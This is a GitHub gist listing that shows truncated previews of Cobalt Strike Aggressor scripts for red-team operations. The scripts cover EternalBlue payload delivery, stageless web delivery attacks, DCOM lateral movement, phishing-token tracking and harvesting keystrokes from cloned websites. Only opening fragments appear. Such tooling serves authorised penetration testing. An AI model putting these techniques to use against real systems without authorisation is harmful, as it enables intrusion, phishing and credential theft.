Raphael Mudge rsmudge
@rsmudge
rsmudge / initial.cna
Created Feb 20, 2019
How to automate Beacon to execute a sequence of tasks with each checkin...
View initial.cna
#
# Demonstrate how to queue tasks to execute with each checkin...
#
#
# yield tells a function to pause and return a value. The next time the same instance of the
# function is called, it will resume after where it last yielded.
#
sub stuffToDo {
    # Tasks for first checkin
@rsmudge
rsmudge / mouse.cna
Created Mar 21, 2018
How to add a popup handler to a Swing component in Aggressor Script/Sleep
View mouse.cna
# demonstrate how to add a popup handler to a Swing component in Sleep
import java.awt.*;
import javax.swing.*;
import javax.swing.event.*;
# safely add a listener to show a popup
sub setupPopupMenu {
    # we're using fork({}) to run this in a separate Aggressor Script environment.
@rsmudge
rsmudge / safedelete.cna
Created Sep 1, 2017
Override default file browser popup in Cobalt Strike to prompt user when they try to delete a file.
View safedelete.cna
#
# safe delete in file browser right-click menu
#
popup_clear("filebrowser");
popup filebrowser {
    item "&Download" {
        local('$file');
        foreach $file ($3) {
            bdownload($1, "$2 $+ \\ $+ $file");
@rsmudge
rsmudge / eternalblue.cna
Last active May 15, 2019
Script to deliver Cobalt Strike's Beacon payload with the Metasploit Framework's exploit/windows/smb/ms17_010_eternalblue exploit.
View eternalblue.cna
#
# script to help move around with ms17-010 from Metasploit
# Go to Attacks -> Eternal Blue
#
# target, listener, where to save .rc file
sub generate_rc_file {
    local('$target $listener $where $handle $shellcode');
    ($target, $listener, $where) = @_;
@rsmudge
rsmudge / stagelesspython.cna
Created Apr 26, 2017
Stageless Python Web Delivery attack. Kind of fun. I did cheat and use an internal API. :)
View stagelesspython.cna
# Python Stageless Scripted Web Delivery
# setup our stageless Python Web Delivery attack
sub setup_attack {
    local('%options $x86payload $x64payload $url $script');
    %options = $3;
    # generate our stageless x86 payload
    artifact_stageless(%options["listener"], "raw", "x86", $null, $this);
    yield;
@rsmudge
rsmudge / tokenToEmail.cna
Created Mar 31, 2017
This script demonstrates how to change Cobalt Strike's WEB_HIT and PROFILER_HIT hooks to resolve a phishing token to an email address.
View tokenToEmail.cna
#
# This script overrides WEB_HIT and PROFILER_HIT from default.cna to
# resolve the id var (token) to an email
#
# https://www.cobaltstrike.com/aggressor-script/cobaltstrike.html
#
# method, uri, addr, ua, response, size, handler, when
set WEB_HIT {
    local('$out $now $method $uri $addr $ua $response $size $handler $when $params');
@rsmudge
rsmudge / stagelessweb.cna
Last active Mar 27, 2019
A stageless variant of the PowerShell Web Delivery attack. This script demonstrates the new scripting APIs in Cobalt Strike 3.7 (generate stageless artifacts, host content on Cobalt Strike's web server, build dialogs, etc.)
View stagelessweb.cna
# Scripted Web Delivery (Stageless)
#
# This script demonstrates some of the new APIs in Cobalt Strike 3.7.
# setup our stageless PowerShell Web Delivery attack
sub setup_attack {
    local('%options $script $url $arch');
    %options = $3;
    # get the arch right.
@rsmudge
rsmudge / comexec.cna
Created Jan 6, 2017
Lateral Movement with the MMC20.Application COM Object (Aggressor Script Alias)
View comexec.cna
# Lateral Movement alias
# https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/
# register help for our alias
beacon_command_register("com-exec", "lateral movement with DCOM",
"Synopsis: com-exec [target] [listener]\n\n" .
"Run a payload on a target via DCOM MMC20.Application Object");
# here's our alias to collect our arguments
alias com-exec {
View portfwd.cna
#
# port forward alias in Beacon and SSH
#
# pull common code into a function
sub _portfwd {
    if ($2 eq "stop") {
        btask($1, "Tasked session to stop forward to $3");
        call("beacons.pivot_stop_port", $null, $3);
    }
@rsmudge
rsmudge / webkeystrokes.cna
Created Aug 10, 2016
Shows how to pull keystrokes captured by website clone tool from Cobalt Strike's data model. Go to View -> Script Console. Type: load /path/to/webkeystrokes.cna. Then type 'pull'. This will present the information to you.
View webkeystrokes.cna
# convert comma separated keystroke values into a string.
sub toString {
    local('@temp');
    @temp = split(",", $1);
    shift(@temp);
    return join("", map({
        return chr(parseNumber($1, 16, 10));
    }, @temp));
}